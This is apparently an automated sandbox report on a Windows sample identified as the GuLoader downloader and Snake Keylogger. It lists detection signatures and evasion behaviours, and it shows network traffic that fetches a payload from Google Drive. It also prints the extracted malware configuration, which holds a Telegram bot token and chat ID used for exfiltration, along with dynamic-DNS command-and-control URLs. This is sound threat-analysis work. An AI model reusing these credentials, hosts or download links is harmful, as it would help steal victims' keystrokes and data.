Edit tour

Windows Analysis Report
rJustificante67.exe

Overview

General Information

Sample name:	rJustificante67.exe
Analysis ID:	1617433
MD5:	96bc48e7cc38d731e7e2c25f3f80a88e
SHA1:	bd30afd2f438928b3cb98d9f74766f1e401db091
SHA256:	79714172680d9fd5b1d49fc518abe9cef9200194a04b6611466beccb28c31728
Tags:	exenjratuser-Porcupine
Infos:

Detection

GuLoader, Snake Keylogger

Score:	88
Range:	0 - 100
Confidence:	100%

Signatures

Found malware configuration

Multi AV Scanner detection for submitted file

Yara detected GuLoader

Yara detected Snake Keylogger

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect virtualization through RDTSC time measurements

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Detected potential crypto function

Drops PE files

Enables debug privileges

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

One or more processes crash

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Shows file infection / information gathering behavior (enumerates multiple directory for files)

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

rJustificante67.exe (PID: 4828 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)

rJustificante67.exe (PID: 3428 cmdline: "C:\Users\user\Desktop\rJustificante67.exe" MD5: 96BC48E7CC38D731E7E2C25F3F80A88E)

WerFault.exe (PID: 2832 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 3428 -s 2548 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-usering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2730568468.000000000185C000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000000.00000002.2612554748.000000000333C000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-17T23:02:12.643085+0100	2803270	2	Potentially Bad Traffic	192.168.2.6	49969	142.250.185.78	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp

Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7809339088:AAEUtMa_u0dd_zBfAWh2Ah2az4h6hNs_Wg0", "Chat_id": "7618581100", "Version": "4.4"}

Multi AV Scanner detection for submitted file

Source: rJustificante67.exe	ReversingLabs: Detection: 32%
Source: rJustificante67.exe	Virustotal: Detection: 23%			Perma Link

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: rJustificante67.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.6:49976 version: TLS 1.2

Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr
Source:	Binary string: n0C:\Windows\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.pdbd source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Configuration.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdbFg# source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Xml.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Xml.ni.pdbRSDS# source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: Microsoft.VisualBasic.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Windows.Forms.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2760384709.000000003580E000.00000004.00000020.00020000.00000000.sdmp, WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029F6000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\Desktop\rJustificante67.PDBXs< source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: \??\C:\Windows\mscorlib.pdb source: rJustificante67.exe, 00000006.00000002.2760342209.00000000357B0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: 5%%.pdb source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.Configuration.ni.pdbRSDScUN source: WER4393.tmp.dmp.9.dr
Source:	Binary string: C:\Users\user\Desktop\rJustificante67.PDB source: rJustificante67.exe, 00000006.00000002.2759816390.0000000032CB7000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WER4393.tmp.dmp.9.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WER4393.tmp.dmp.9.dr

Source: C:\Users\user\Desktop\rJustificante67.exe

Directory queried: number of queries: 1001

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00402706 FindFirstFileW,	0_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_004061E5 FindFirstFileW,FindClose,	0_2_004061E5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_00402706 FindFirstFileW,	6_2_00402706
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_00405731 CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	6_2_00405731
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_004061E5 FindFirstFileW,FindClose,	6_2_004061E5

Source: Joe Sandbox View

IP Address: 132.226.8.169 132.226.8.169

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown

DNS query: name: checkip.dyndns.org

Source: Network traffic

Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:49969 -> 142.250.185.78:443

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org

Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032F2D000.00000004.00000800.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000002.2759965563.0000000032F43000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: rJustificante67.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.9.dr	String found in binary or memory: http://upx.sf.net
Source: rJustificante67.exe, 00000006.00000002.2759965563.0000000032E81000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: rJustificante67.exe, 00000006.00000002.2732658686.0000000002938000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: rJustificante67.exe, 00000006.00000002.2759412293.0000000031FB0000.00000004.00001000.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000002.2732658686.0000000002970000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV
Source: rJustificante67.exe, 00000006.00000002.2732658686.00000000029A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000002.2732658686.000000000298E000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=download
Source: rJustificante67.exe, 00000006.00000003.2680303299.00000000029A1000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000002.2732658686.00000000029A1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1nDB7ry8SARfoQUp67ibCPOyNMq9q_OUV&export=downloadR
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: rJustificante67.exe, 00000006.00000003.2643629028.00000000029A6000.00000004.00000020.00020000.00000000.sdmp, rJustificante67.exe, 00000006.00000003.2643709302.00000000029A6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com

Source: unknown	Network traffic detected: HTTP traffic on port 49969 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49976 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49969
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49976

Source: unknown	HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.6:49969 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 216.58.212.129:443 -> 192.168.2.6:49976 version: TLS 1.2

Source: C:\Users\user\Desktop\rJustificante67.exe

Code function: 0_2_00405295 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405295

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		0_2_0040331C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_0040331C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		6_2_0040331C

Source: C:\Users\user\Desktop\rJustificante67.exe

File created: C:\Windows\resources\0809

Jump to behavior

Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_00404AD2	0_2_00404AD2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 0_2_004064F7	0_2_004064F7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_00404AD2	6_2_00404AD2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_004064F7	6_2_004064F7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E096A	6_2_016E096A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E116B	6_2_016E116B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2166	6_2_016E2166
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E157D	6_2_016E157D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0D78	6_2_016E0D78
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1976	6_2_016E1976
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E194C	6_2_016E194C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0944	6_2_016E0944
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1D5B	6_2_016E1D5B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1158	6_2_016E1158
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0D57	6_2_016E0D57
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1520	6_2_016E1520
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E213F	6_2_016E213F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E153C	6_2_016E153C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0D3A	6_2_016E0D3A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1D33	6_2_016E1D33
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1131	6_2_016E1131
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0D07	6_2_016E0D07
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E211C	6_2_016E211C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0915	6_2_016E0915
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1112	6_2_016E1112
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1D12	6_2_016E1D12
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E19EF	6_2_016E19EF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1DEF	6_2_016E1DEF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E21FE	6_2_016E21FE
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0DFD	6_2_016E0DFD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E15F9	6_2_016E15F9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E11F9	6_2_016E11F9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E19CF	6_2_016E19CF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E15CC	6_2_016E15CC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0DC8	6_2_016E0DC8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1DC9	6_2_016E1DC9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E11C5	6_2_016E11C5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E21DF	6_2_016E21DF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0DDC	6_2_016E0DDC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E09D7	6_2_016E09D7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E09AE	6_2_016E09AE
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E19AD	6_2_016E19AD
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0DA4	6_2_016E0DA4
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E15A2	6_2_016E15A2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1DB8	6_2_016E1DB8
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E21B1	6_2_016E21B1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E218F	6_2_016E218F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1189	6_2_016E1189
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1D84	6_2_016E1D84
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0997	6_2_016E0997
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1990	6_2_016E1990
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E006D	6_2_016E006D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1C68	6_2_016E1C68
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2068	6_2_016E2068
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1066	6_2_016E1066
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1872	6_2_016E1872
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0873	6_2_016E0873
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C73	6_2_016E0C73
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E004E	6_2_016E004E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E144F	6_2_016E144F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E204A	6_2_016E204A
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2048	6_2_016E2048
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1C46	6_2_016E1C46
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1041	6_2_016E1041
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E005F	6_2_016E005F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C57	6_2_016E0C57
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E142F	6_2_016E142F
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0828	6_2_016E0828
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1028	6_2_016E1028
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1C22	6_2_016E1C22
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E2021	6_2_016E2021
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E083E	6_2_016E083E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E203E	6_2_016E203E
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E183C	6_2_016E183C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C39	6_2_016E0C39
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C30	6_2_016E0C30
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E000B	6_2_016E000B
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0C09	6_2_016E0C09
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1816	6_2_016E1816
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0812	6_2_016E0812
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0012	6_2_016E0012
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1CE9	6_2_016E1CE9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E10E7	6_2_016E10E7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0CE2	6_2_016E0CE2
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E18F6	6_2_016E18F6
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E20F4	6_2_016E20F4
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E08F0	6_2_016E08F0
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E10CF	6_2_016E10CF
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1CCC	6_2_016E1CCC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E18DC	6_2_016E18DC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E08DA	6_2_016E08DA
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E20D1	6_2_016E20D1
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E10AC	6_2_016E10AC
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E14A7	6_2_016E14A7
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E08A5	6_2_016E08A5
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E18BE	6_2_016E18BE
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E20BB	6_2_016E20BB
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E0CB9	6_2_016E0CB9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E14B9	6_2_016E14B9
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E208C	6_2_016E208C
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E1488	6_2_016E1488
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E109D	6_2_016E109D
Source: C:\Users\user\Desktop\rJustificante67.exe	Code function: 6_2_016E189D	6_2_016E189D
